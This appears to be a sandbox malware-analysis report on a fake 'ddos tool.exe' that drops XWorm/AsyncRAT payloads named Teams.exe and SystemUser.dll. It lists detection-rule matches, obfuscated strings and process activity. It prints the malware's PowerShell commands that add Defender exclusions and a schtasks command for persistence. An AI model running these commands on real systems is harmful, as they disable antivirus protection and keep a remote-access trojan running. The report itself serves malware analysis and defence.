                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4_2_00007FF848E712904_2_00007FF848E71290
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4_2_00007FF848E76E724_2_00007FF848E76E72
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4_2_00007FF848E7E2184_2_00007FF848E7E218
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4_2_00007FF848E717194_2_00007FF848E71719
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4_2_00007FF848E760C64_2_00007FF848E760C6
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4_2_00007FF848E7FC3A4_2_00007FF848E7FC3A
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4_2_00007FF848E7E1084_2_00007FF848E7E108
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4_2_00007FF848E720F14_2_00007FF848E720F1
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4_2_00007FF848E710A54_2_00007FF848E710A5
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F430E95_2_00007FF848F430E9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F330E911_2_00007FF848F330E9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848F430E913_2_00007FF848F430E9
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllCode function: 18_2_00007FF848E7171918_2_00007FF848E71719
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllCode function: 18_2_00007FF848E720F118_2_00007FF848E720F1
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllCode function: 18_2_00007FF848E7103818_2_00007FF848E71038
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllCode function: 21_2_00007FF848E6171921_2_00007FF848E61719
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllCode function: 21_2_00007FF848E620F121_2_00007FF848E620F1
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllCode function: 21_2_00007FF848E6103821_2_00007FF848E61038
                  Source: ddos tool.exe, 00000000.00000002.1998357899.0000000000C95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs ddos tool.exe
                  Source: ddos tool.exe, 00000000.00000000.1990659793.00000000006A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTeams.exe4 vs ddos tool.exe
                  Source: ddos tool.exeBinary or memory string: OriginalFilenameTeams.exe4 vs ddos tool.exe
                  Source: ddos tool.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 4.0.Teams.exe.8d0000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 4.0.Teams.exe.8d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000004.00000002.2938411155.0000000012B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: ddos tool.exe, XCzpg27Fsi7z0fee4sAiaLAV.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Teams.exe.0.dr, RDx4hRwz6aSzmOHct93qaa3Naoe.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Teams.exe.0.dr, bimUsjvre7ZstFKFZOMuKgeRCCJ.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Teams.exe.0.dr, bimUsjvre7ZstFKFZOMuKgeRCCJ.csCryptographic APIs: 'TransformFinalBlock'
                  Source: SystemUser.dll.4.dr, RDx4hRwz6aSzmOHct93qaa3Naoe.csCryptographic APIs: 'TransformFinalBlock'
                  Source: SystemUser.dll.4.dr, bimUsjvre7ZstFKFZOMuKgeRCCJ.csCryptographic APIs: 'TransformFinalBlock'
                  Source: SystemUser.dll.4.dr, bimUsjvre7ZstFKFZOMuKgeRCCJ.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 4.2.Teams.exe.1cf40000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 4.2.Teams.exe.1cf40000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Teams.exe.0.dr, Ior8uDO9Bk6c8N4xxlbBxlE0nwuQDbeIqAFHPz0Apy.csBase64 encoded string: 'nOV1pZtqQKtZYbLHowsjtIf7PR69hz0RCPiyPuDHkEQQiKBiYyBtd6vw2bolANA8YLdMQrHxyjKoJdqyA9RUrUZxF9Mh', 'q0hAFVR7UZigZQfJfhV0SS27rud1FNW3u1rWpCSbuBL5yL6b56L0BGVEUW9DUenyD8wyXAPclubFHrYgvGsn1yFX60oW', 'oPzPWiVrLvXAg0nczFg16FwkUc08HYNCMHlXhtD90KnkPunLtQusKbj9OeS3oZOWv8pPEjqkmklbOCWi3owN1pqwio18', 'HlpnB0xNQypdYxWPRmg7d0ycj4iwqGfvruCcsa1jDxx4rrblzw77Yx6dWuRrr1DZGvLzoh79x9xBWMNu4tdO51Dsdg9x'
                  Source: Teams.exe.0.dr, M2XV29eR6jcgwA78ZebgeWlObVr.csBase64 encoded string: 'HthjKNzQ2rc0VezBHlvzJLbXMU2hg2QATkOgS6Xjw6dcW7ru549gi7R8LgdWvglQbdYec7XHnoBiK0lUHqxiU004GIYd', 'WVGBqJgq12rNFWEHReokPad5MC1lqOMf5xWiJ2LjA2x7fuxsddFeZVlKd6cos7SjR2KdI6QlVxpuFcSH56FdXKKr8dcp'
                  Source: Teams.exe.0.dr, ML451EmqZtauGOpkV4NJKHm5nWW.csBase64 encoded string: 'TyZXVgXs4WsxCNhtcCpCiePF4TGaTNRfCSNawyka8BFtCtEY36RwjIBcneiFAMBD4HsJlv64VRQT33WJfnBmK4rpZzvE', 'hrMLBYy7MmbCUIR3l21soilMohZY6BVLvzYJ6lBBu8m1cvCv8Ei4ZMQrZLVOYDOF1mo5iUq5OanMLEVyl6lZuBj5nj5L', 'wAdF2e7kOtIUBy0b9C5Dz5xCekfppSNIlpJrYrUfZHzCdt4OBinll5tGscGXf9AcZ32GhBemKKazrDjwEpCNYQQgF226', 'uLLSjnqKuoDr4YFWJIkAitURn5klCmTTOIBWG81QVSa1dmo8kCpZVB81PJPBWRv1A4hAgq8SiBp8lDAMKrpFHlkCEnHX', 'wh6cnU738RzyfmNTMGUmPExVe3GobbEu86uH4MjtMgkY1DeHX2TPoYNKvZxPLjskEf9Ow4snHTJpR9pPpeLF2SUA7sWG', 'uVmOehy2RSaF7UgDdE8JvEa3u5Z8ZLxkPmy0NlalMyyozhvFnifm3um2DBVutcdAxSxfxB0Ag6ppCjf1WgFNe9ud8xSk', 'Z5xiizpfjeZzJOP3UIEkXO5UUSPNfMoEzmjQcqPltRKysyKxosiLZejWrIGCeurDB0Ovik0xG7lHsDCvoS4HAsuAGWAe', 'k3fK8ccTzDulwR0roTXpqPR7TLgUaZsyvtJDaPdvsUnTU7UElNNoXlKCS5uOdUSEEjKPu7yznjucdNB5GjvFhJrPhl9U', 'VnjBuwPwYdyVBlPMJfw4lUybosxdiSHugDo9DHqMjk10macu8KqwUmABkmuTQWXaLukmoYJIYCKMR9mBlZyo5FBe4eur'
                  Source: Teams.exe.0.dr, 4CfOXREK3ocXQ3Rlng65ZiKxcuc.csBase64 encoded string: 'L8LMVCAsKM77lZl0eqw0wHQdKRpsjgo4cEXg2tVCv1ap20YBZ05lT1sqLaJcXhhbKzdwo2onelK2gtjDfFXctnz4TS6N', 'HfcHlydsX9cyc5IgRXiJxPqSYO1xC3L6z6Z5y6m8m7UsBr18GGpom3TmYbd54xL0EhAxjdEp3UqC5S1EJBQx1d1Ni1Aj', 'XKXPAqtd68cCC9tE5Jw5nFBi4KEqlJSukZVYgm80paYa10rVLOLexIcOETSIsaHs70yorSG1Q63nN42PrF1FmTgd6t8V', 'HsAUv2Kn3ztbF0XXsU2qyNyg4bzzBGDZTDokOsnX3jT3C29Eqn0mND2zzbRyoLckvwIlIiKRXdBJ0nQLFoEX0M3zuvQy'
                  Source: SystemUser.dll.4.dr, Ior8uDO9Bk6c8N4xxlbBxlE0nwuQDbeIqAFHPz0Apy.csBase64 encoded string: 'nOV1pZtqQKtZYbLHowsjtIf7PR69hz0RCPiyPuDHkEQQiKBiYyBtd6vw2bolANA8YLdMQrHxyjKoJdqyA9RUrUZxF9Mh', 'q0hAFVR7UZigZQfJfhV0SS27rud1FNW3u1rWpCSbuBL5yL6b56L0BGVEUW9DUenyD8wyXAPclubFHrYgvGsn1yFX60oW', 'oPzPWiVrLvXAg0nczFg16FwkUc08HYNCMHlXhtD90KnkPunLtQusKbj9OeS3oZOWv8pPEjqkmklbOCWi3owN1pqwio18', 'HlpnB0xNQypdYxWPRmg7d0ycj4iwqGfvruCcsa1jDxx4rrblzw77Yx6dWuRrr1DZGvLzoh79x9xBWMNu4tdO51Dsdg9x'
                  Source: SystemUser.dll.4.dr, M2XV29eR6jcgwA78ZebgeWlObVr.csBase64 encoded string: 'HthjKNzQ2rc0VezBHlvzJLbXMU2hg2QATkOgS6Xjw6dcW7ru549gi7R8LgdWvglQbdYec7XHnoBiK0lUHqxiU004GIYd', 'WVGBqJgq12rNFWEHReokPad5MC1lqOMf5xWiJ2LjA2x7fuxsddFeZVlKd6cos7SjR2KdI6QlVxpuFcSH56FdXKKr8dcp'
                  Source: SystemUser.dll.4.dr, ML451EmqZtauGOpkV4NJKHm5nWW.csBase64 encoded string: 'TyZXVgXs4WsxCNhtcCpCiePF4TGaTNRfCSNawyka8BFtCtEY36RwjIBcneiFAMBD4HsJlv64VRQT33WJfnBmK4rpZzvE', 'hrMLBYy7MmbCUIR3l21soilMohZY6BVLvzYJ6lBBu8m1cvCv8Ei4ZMQrZLVOYDOF1mo5iUq5OanMLEVyl6lZuBj5nj5L', 'wAdF2e7kOtIUBy0b9C5Dz5xCekfppSNIlpJrYrUfZHzCdt4OBinll5tGscGXf9AcZ32GhBemKKazrDjwEpCNYQQgF226', 'uLLSjnqKuoDr4YFWJIkAitURn5klCmTTOIBWG81QVSa1dmo8kCpZVB81PJPBWRv1A4hAgq8SiBp8lDAMKrpFHlkCEnHX', 'wh6cnU738RzyfmNTMGUmPExVe3GobbEu86uH4MjtMgkY1DeHX2TPoYNKvZxPLjskEf9Ow4snHTJpR9pPpeLF2SUA7sWG', 'uVmOehy2RSaF7UgDdE8JvEa3u5Z8ZLxkPmy0NlalMyyozhvFnifm3um2DBVutcdAxSxfxB0Ag6ppCjf1WgFNe9ud8xSk', 'Z5xiizpfjeZzJOP3UIEkXO5UUSPNfMoEzmjQcqPltRKysyKxosiLZejWrIGCeurDB0Ovik0xG7lHsDCvoS4HAsuAGWAe', 'k3fK8ccTzDulwR0roTXpqPR7TLgUaZsyvtJDaPdvsUnTU7UElNNoXlKCS5uOdUSEEjKPu7yznjucdNB5GjvFhJrPhl9U', 'VnjBuwPwYdyVBlPMJfw4lUybosxdiSHugDo9DHqMjk10macu8KqwUmABkmuTQWXaLukmoYJIYCKMR9mBlZyo5FBe4eur'
                  Source: SystemUser.dll.4.dr, 4CfOXREK3ocXQ3Rlng65ZiKxcuc.csBase64 encoded string: 'L8LMVCAsKM77lZl0eqw0wHQdKRpsjgo4cEXg2tVCv1ap20YBZ05lT1sqLaJcXhhbKzdwo2onelK2gtjDfFXctnz4TS6N', 'HfcHlydsX9cyc5IgRXiJxPqSYO1xC3L6z6Z5y6m8m7UsBr18GGpom3TmYbd54xL0EhAxjdEp3UqC5S1EJBQx1d1Ni1Aj', 'XKXPAqtd68cCC9tE5Jw5nFBi4KEqlJSukZVYgm80paYa10rVLOLexIcOETSIsaHs70yorSG1Q63nN42PrF1FmTgd6t8V', 'HsAUv2Kn3ztbF0XXsU2qyNyg4bzzBGDZTDokOsnX3jT3C29Eqn0mND2zzbRyoLckvwIlIiKRXdBJ0nQLFoEX0M3zuvQy'
                  Source: SystemUser.dll.4.dr, Ior8uDO9Bk6c8N4xxlbBxlE0nwuQDbeIqAFHPz0Apy.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: SystemUser.dll.4.dr, Ior8uDO9Bk6c8N4xxlbBxlE0nwuQDbeIqAFHPz0Apy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: Teams.exe.0.dr, Ior8uDO9Bk6c8N4xxlbBxlE0nwuQDbeIqAFHPz0Apy.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: Teams.exe.0.dr, Ior8uDO9Bk6c8N4xxlbBxlE0nwuQDbeIqAFHPz0Apy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/29@2/3
                  Source: C:\Users\user\Desktop\ddos tool.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ddos tool.exe.logJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllMutant created: NULL
                  Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5636:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeMutant created: \Sessions\1\BaseNamedObjects\KRyh18U6epkozi95
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
                  Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5616:120:WilError_03
                  Source: C:\Users\user\Desktop\ddos tool.exeMutant created: \Sessions\1\BaseNamedObjects\Px4WdY1aL1K9DGeql
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1536:120:WilError_03
                  Source: C:\Users\user\Desktop\ddos tool.exeFile created: C:\Users\user\AppData\Local\Temp\lil bot.batJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\lil bot.bat" "
                  Source: ddos tool.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ddos tool.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\ddos tool.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: ddos tool.exeReversingLabs: Detection: 68%
                  Source: unknownProcess created: C:\Users\user\Desktop\ddos tool.exe "C:\Users\user\Desktop\ddos tool.exe"
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\lil bot.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess created: C:\Users\user\AppData\Local\Temp\Teams.exe "C:\Users\user\AppData\Local\Temp\Teams.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Teams.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\SystemUser.dll'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser.dll'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser" /tr "C:\Users\user\AppData\Local\Temp\SystemUser.dll"
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\SystemUser.dll C:\Users\user\AppData\Local\Temp\SystemUser.dll
                  Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\SystemUser.dll C:\Users\user\AppData\Local\Temp\SystemUser.dll
                  Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\lil bot.bat" "Jump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess created: C:\Users\user\AppData\Local\Temp\Teams.exe "C:\Users\user\AppData\Local\Temp\Teams.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Teams.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\SystemUser.dll'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser.dll'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser" /tr "C:\Users\user\AppData\Local\Temp\SystemUser.dll"Jump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: windows.staterepositoryps.dllJump to behavior
